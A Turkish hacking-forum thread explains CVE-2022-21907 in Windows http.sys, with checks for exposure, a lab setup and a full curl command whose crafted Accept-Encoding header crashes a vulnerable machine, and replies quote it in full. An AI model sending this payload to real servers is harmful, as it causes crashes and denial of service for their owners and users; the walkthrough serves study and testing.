CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

a3b2jeo.png

logo.png

Görsel


CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

Son zamanlarda, Microsoft Windows HTTP protokol stack için bir CVE (Ortak Zayıflık ve Pozisyon) kamuoyuna açıklandı. Uzaktan, kimlik doğrulamasız bir saldırganın sistemi tamamen ele geçirmesine neden olabileceği etkilenen çeşitli Windows sürümleri bulunmaktadır, bunlar arasında yeni Windows 11 İşletim Sistemi de bulunmaktadır (ARM64 ve x64 tabanlı sistemler).

Bu zafiyetin nasıl kullanılabileceğini gösteren bir PoC (Kavram Kanıtı) zaten kamuoyunda mevcut, bu da sistemi çökertmek (Windows Blue Screen of Death) için nasıl kullanılabileceğini gösteriyor. Tek bir saldırı iterasyonu ile Windows cihazı yeniden başlatılacak ve normal olarak çalışacaktır, ancak sürekli saldırı, Hizmet Reddi (DoS) koşullarına yol açabilir.


Savunmasız mısınız?
İyi haber, bu zafiyeti sömürmek için yerine getirilmesi gereken birkaç gereksinim bulunmasıdır:

Windows için temel HTTP motoru olan http.sys, Microsoft Internet Information Services (IIS) ve diğerleri gibi hizmetler tarafından kullanılmalıdır. Bu hizmetin bilgisayarınızda yüklü olup olmadığını, PowerShell / CMD penceresinde aşağıdaki komutu çalıştırarak kontrol edebilirsiniz:

netsh http show servicestate.
Bu tür bir hizmet çalışıyorsa, aşağıdaki resimde görüldüğü gibi bazı girişleri göreceksiniz, ardından bir sonraki gereksinimi kontrol edin.


127f19c06bf213ee5.png


EnableTrailerSupport (burada trailer'lar hakkında daha fazla bilgi bulabilirsiniz) kayıt değeri aracılığıyla HTTP Trailer Desteği etkinleştirilmeli ve 0'dan farklı bir değere ayarlanmalıdır. Bu kayıt değerinin varlığı, burada belirtilen PowerShell tek satırlarını çalıştırarak kontrol edilebilir ve düzeltilerek sağlanabilir.

111acdd1e2df7cbdb.png


Saldırı Eylemi ve Hedefi Yapılandırma
Saldırıya duyarlı bir Windows makinesine ihtiyacımız var. Bizim test ettiğimiz makine, Windows 10 21H1 Build 19043'e sahip bir Sanal makinedir.

Şimdi, http.sys programını kullanan bir servise ihtiyacımız var, örneğin IIS. IIS'i buradan indirin ve kurun.
IIS'i etkinleştirmek için, Kontrol Paneli'ni seçin > Programlar ve Özellikler > Windows Özelliklerini Aç veya Kapat > IIS'i işaretleyin ve ardından Dünya Çapında Web Hizmetleri onay kutusunu seçin. IIS'i etkinleştirmek için Tamam'ı seçin.


183fdd3a9eeb76e52.png


Registry Düzenleyici'ni açın. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters dizinine gidin ve Parameters'a yeni bir kayıt değeri ekleyin (İkinci resme başvurun). 'EnableTrailerSupport' adında ve değerini 'dword:00000001' olarak değiştirin.

Makine artık CVE-2022-21907'ye karşı savunmasız şekilde yapılandırılmıştır.

Aynı ağdaki farklı bir makineden (bizim durumumuzda Ubuntu 18), curl (istek göndermek için kullanılan bir araç) kullanarak HTTP isteği gönderin (POC'dan alınan accept encoding değeri) (hedef makinenin IP adresiyle $WINDOWS_IP'yi değiştirin).
curl $WINDOWS_IP:80 -sH "Accept-encoding: AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&SISODDJJDJJDJJJDJJSUS,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************, *, ,"


Gönderilen gerçek HTTP isteğini görmek için Wireshark gibi bir trafik yakalama aracı kurun. Aşağıdaki resim, Wireshark tarafından yakalanan isteği göstermektedir. Zararlı Accept-encoding başlık değeri net bir şekilde görülebilir.


1956fac28bc998977.png


Windows'un Mavi Ekranını (BSoD) gözlemleyin, bu da saldırımızın başarılı olduğu anlamına gelir.

1ad0e91d6a352b874.png


Accept-Encoding değeri üzerinde denemeler yaptığımızda, zafiyeti tetikleyebilen en düşük Accept-Encoding değerinin aşağıdaki değerlere sahip olduğunu gözlemledik (her ikisi de gereklidir):

En az bir bilinmeyen/geçersiz kodlama değeri ve abbc veya abb*c gibi rastgele bir şeyin bulunması gerekmektedir.
En az iki boşluk/doldurulmuş değerin sonunda bulunması gerekmektedir.

Bu nedenle, aşağıdaki gibi bir dize zafiyeti tetikleyebilir:
154e2f1ca89e65ca9.png


Bu darbe, saldırganların ağınıza karşı kullanabileceği birçok saldırı varyasyonunu içermektedir.




14daedb6d5f28f70b.png




a3b2jeo.png
 
Son düzenleme:

'Anka

Basın&Medya Ekibi Kıdemli
8 Eyl 2021
3,326
2,512
Merhaba,

Bu makaleyi paylaştığınız için teşekkür etmek istiyorum. CVE-2022-21907 - HTTP DOS Güvenlik Açığı hakkında bilgi verdiğiniz için ve oldukça yararlı bir kaynak olduğunu düşünüyorum. Bu tür güvenlik açıkları hakkında bilgi sahibi olmak, siber güvenlik konusunda bilinçlenmemize yardımcı olur. Güncel ve ilgi çekici içeriklerini paylaşmaya devam ettiğiniz için teşekkür ederim.

Saygılarımla,
'Anka
 
Merhaba,

Bu makaleyi paylaştığınız için teşekkür etmek istiyorum. CVE-2022-21907 - HTTP DOS Güvenlik Açığı hakkında bilgi verdiğiniz için oldukça yararlı bir kaynak olduğunu düşünüyorum. Bu tür güvenlik açıkları hakkında bilgi sahibi olmak, siber güvenlik konusunda bilinçlenmemize yardımcı olur. Güncel ve ilgi çekici içeriklerini paylaşmaya devam ettiğiniz için teşekkür ederim.

Saygılarımla,
'Anka
Çok teşekkür ederim.Forum içersinde elimizden ne gelirse.Güzel yorumunuz için teşekkür ederim.
 

Çokgen

Katılımcı Üye
4 Eyl 2023
412
196
a3b2jeo.png

logo.png

Görsel


CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

Son zamanlarda, Microsoft Windows HTTP protokol stack için bir CVE (Ortak Zayıflık ve Pozisyon) kamuoyuna açıklandı. Uzaktan, kimlik doğrulamasız bir saldırganın sistemi tamamen ele geçirmesine neden olabileceği etkilenen çeşitli Windows sürümleri bulunmaktadır, bunlar arasında yeni Windows 11 İşletim Sistemi de bulunmaktadır (ARM64 ve x64 tabanlı sistemler).

Bu zafiyetin nasıl kullanılabileceğini gösteren bir PoC (Kavram Kanıtı) zaten kamuoyunda mevcut, bu da sistemi çökertmek (Windows Blue Screen of Death) için nasıl kullanılabileceğini gösteriyor. Tek bir saldırı iterasyonu ile Windows cihazı yeniden başlatılacak ve normal olarak çalışacaktır, ancak sürekli saldırı, Hizmet Reddi (DoS) koşullarına yol açabilir.


Savunmasız mısınız?
İyi haber, bu zafiyeti sömürmek için yerine getirilmesi gereken birkaç gereksinim bulunmasıdır:

Windows için temel HTTP motoru olan http.sys, Microsoft Internet Information Services (IIS) ve diğerleri gibi hizmetler tarafından kullanılmalıdır. Bu hizmetin bilgisayarınızda yüklü olup olmadığını, PowerShell / CMD penceresinde aşağıdaki komutu çalıştırarak kontrol edebilirsiniz:

netsh http show servicestate.
Bu tür bir hizmet çalışıyorsa, aşağıdaki resimde görüldüğü gibi bazı girişleri göreceksiniz, ardından bir sonraki gereksinimi kontrol edin.


127f19c06bf213ee5.png


EnableTrailerSupport (burada trailer'lar hakkında daha fazla bilgi bulabilirsiniz) kayıt değeri aracılığıyla HTTP Trailer Desteği etkinleştirilmeli ve 0'dan farklı bir değere ayarlanmalıdır. Bu kayıt değerinin varlığı, burada belirtilen PowerShell tek satırlarını çalıştırarak kontrol edilebilir ve düzeltilerek sağlanabilir.

111acdd1e2df7cbdb.png


Saldırı Eylemi ve Hedefi Yapılandırma
Saldırıya duyarlı bir Windows makinesine ihtiyacımız var. Bizim test ettiğimiz makine, Windows 10 21H1 Build 19043'e sahip bir Sanal makinedir.

Şimdi, http.sys programını kullanan bir servise ihtiyacımız var, örneğin IIS. IIS'i buradan indirin ve kurun.
IIS'i etkinleştirmek için, Kontrol Paneli'ni seçin > Programlar ve Özellikler > Windows Özelliklerini Aç veya Kapat > IIS'i işaretleyin ve ardından Dünya Çapında Web Hizmetleri onay kutusunu seçin. IIS'i etkinleştirmek için Tamam'ı seçin.


183fdd3a9eeb76e52.png


Registry Düzenleyici'ni açın. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters dizinine gidin ve Parameters'a yeni bir kayıt değeri ekleyin (İkinci resme başvurun). 'EnableTrailerSupport' adında ve değerini 'dword:00000001' olarak değiştirin.

Makine artık CVE-2022-21907'ye karşı savunmasız şekilde yapılandırılmıştır.

Aynı ağdaki farklı bir makineden (bizim durumumuzda Ubuntu 18), curl (istek göndermek için kullanılan bir araç) kullanarak HTTP isteği gönderin (POC'dan alınan accept encoding değeri) (hedef makinenin IP adresiyle $WINDOWS_IP'yi değiştirin).
curl $WINDOWS_IP:80 -sH "Accept-encoding: AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&SISODDJJDJJDJJJDJJSUS,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************, *, ,"


Gönderilen gerçek HTTP isteğini görmek için Wireshark gibi bir trafik yakalama aracı kurun. Aşağıdaki resim, Wireshark tarafından yakalanan isteği göstermektedir. Zararlı Accept-encoding başlık değeri net bir şekilde görülebilir.


1956fac28bc998977.png


Windows'un Mavi Ekranını (BSoD) gözlemleyin, bu da saldırımızın başarılı olduğu anlamına gelir.

1ad0e91d6a352b874.png


Accept-Encoding değeri üzerinde denemeler yaptığımızda, zafiyeti tetikleyebilen en düşük Accept-Encoding değerinin aşağıdaki değerlere sahip olduğunu gözlemledik (her ikisi de gereklidir):

En az bir bilinmeyen/geçersiz kodlama değeri ve abbc veya abb*c gibi rastgele bir şeyin bulunması gerekmektedir.
En az iki boşluk/doldurulmuş değerin sonunda bulunması gerekmektedir.

Bu nedenle, aşağıdaki gibi bir dize zafiyeti tetikleyebilir:
154e2f1ca89e65ca9.png


Bu darbe, saldırganların ağınıza karşı kullanabileceği birçok saldırı varyasyonunu içermektedir.




14daedb6d5f28f70b.png




a3b2jeo.png
Exploit yazmaya calisiyorum ve sizin sayenizde dahada bilgilenitirum saolun
 

drjacob

Uzman üye
21 Ocak 2012
1,778
406
localhost
a3b2jeo.png

logo.png

Görsel


CVE-2022-21907 HTTP DOS Güvenlik Açığı Nedir ?

Son zamanlarda, Microsoft Windows HTTP protokol stack için bir CVE (Ortak Zayıflık ve Pozisyon) kamuoyuna açıklandı. Uzaktan, kimlik doğrulamasız bir saldırganın sistemi tamamen ele geçirmesine neden olabileceği etkilenen çeşitli Windows sürümleri bulunmaktadır, bunlar arasında yeni Windows 11 İşletim Sistemi de bulunmaktadır (ARM64 ve x64 tabanlı sistemler).

Bu zafiyetin nasıl kullanılabileceğini gösteren bir PoC (Kavram Kanıtı) zaten kamuoyunda mevcut, bu da sistemi çökertmek (Windows Blue Screen of Death) için nasıl kullanılabileceğini gösteriyor. Tek bir saldırı iterasyonu ile Windows cihazı yeniden başlatılacak ve normal olarak çalışacaktır, ancak sürekli saldırı, Hizmet Reddi (DoS) koşullarına yol açabilir.


Savunmasız mısınız?
İyi haber, bu zafiyeti sömürmek için yerine getirilmesi gereken birkaç gereksinim bulunmasıdır:

Windows için temel HTTP motoru olan http.sys, Microsoft Internet Information Services (IIS) ve diğerleri gibi hizmetler tarafından kullanılmalıdır. Bu hizmetin bilgisayarınızda yüklü olup olmadığını, PowerShell / CMD penceresinde aşağıdaki komutu çalıştırarak kontrol edebilirsiniz:

netsh http show servicestate.
Bu tür bir hizmet çalışıyorsa, aşağıdaki resimde görüldüğü gibi bazı girişleri göreceksiniz, ardından bir sonraki gereksinimi kontrol edin.


127f19c06bf213ee5.png


EnableTrailerSupport (burada trailer'lar hakkında daha fazla bilgi bulabilirsiniz) kayıt değeri aracılığıyla HTTP Trailer Desteği etkinleştirilmeli ve 0'dan farklı bir değere ayarlanmalıdır. Bu kayıt değerinin varlığı, burada belirtilen PowerShell tek satırlarını çalıştırarak kontrol edilebilir ve düzeltilerek sağlanabilir.

111acdd1e2df7cbdb.png


Saldırı Eylemi ve Hedefi Yapılandırma
Saldırıya duyarlı bir Windows makinesine ihtiyacımız var. Bizim test ettiğimiz makine, Windows 10 21H1 Build 19043'e sahip bir Sanal makinedir.

Şimdi, http.sys programını kullanan bir servise ihtiyacımız var, örneğin IIS. IIS'i buradan indirin ve kurun.
IIS'i etkinleştirmek için, Kontrol Paneli'ni seçin > Programlar ve Özellikler > Windows Özelliklerini Aç veya Kapat > IIS'i işaretleyin ve ardından Dünya Çapında Web Hizmetleri onay kutusunu seçin. IIS'i etkinleştirmek için Tamam'ı seçin.


183fdd3a9eeb76e52.png


Registry Düzenleyici'ni açın. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\HTTP\Parameters dizinine gidin ve Parameters'a yeni bir kayıt değeri ekleyin (İkinci resme başvurun). 'EnableTrailerSupport' adında ve değerini 'dword:00000001' olarak değiştirin.

Makine artık CVE-2022-21907'ye karşı savunmasız şekilde yapılandırılmıştır.

Aynı ağdaki farklı bir makineden (bizim durumumuzda Ubuntu 18), curl (istek göndermek için kullanılan bir araç) kullanarak HTTP isteği gönderin (POC'dan alınan accept encoding değeri) (hedef makinenin IP adresiyle $WINDOWS_IP'yi değiştirin).
curl $WINDOWS_IP:80 -sH "Accept-encoding: AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&SISODDJJDJJDJJJDJJSUS,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************, *, ,"


Gönderilen gerçek HTTP isteğini görmek için Wireshark gibi bir trafik yakalama aracı kurun. Aşağıdaki resim, Wireshark tarafından yakalanan isteği göstermektedir. Zararlı Accept-encoding başlık değeri net bir şekilde görülebilir.


1956fac28bc998977.png


Windows'un Mavi Ekranını (BSoD) gözlemleyin, bu da saldırımızın başarılı olduğu anlamına gelir.

1ad0e91d6a352b874.png


Accept-Encoding değeri üzerinde denemeler yaptığımızda, zafiyeti tetikleyebilen en düşük Accept-Encoding değerinin aşağıdaki değerlere sahip olduğunu gözlemledik (her ikisi de gereklidir):

En az bir bilinmeyen/geçersiz kodlama değeri ve abbc veya abb*c gibi rastgele bir şeyin bulunması gerekmektedir.
En az iki boşluk/doldurulmuş değerin sonunda bulunması gerekmektedir.

Bu nedenle, aşağıdaki gibi bir dize zafiyeti tetikleyebilir:
154e2f1ca89e65ca9.png


Bu darbe, saldırganların ağınıza karşı kullanabileceği birçok saldırı varyasyonunu içermektedir.




14daedb6d5f28f70b.png




a3b2jeo.png
eline sağlık hocam.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.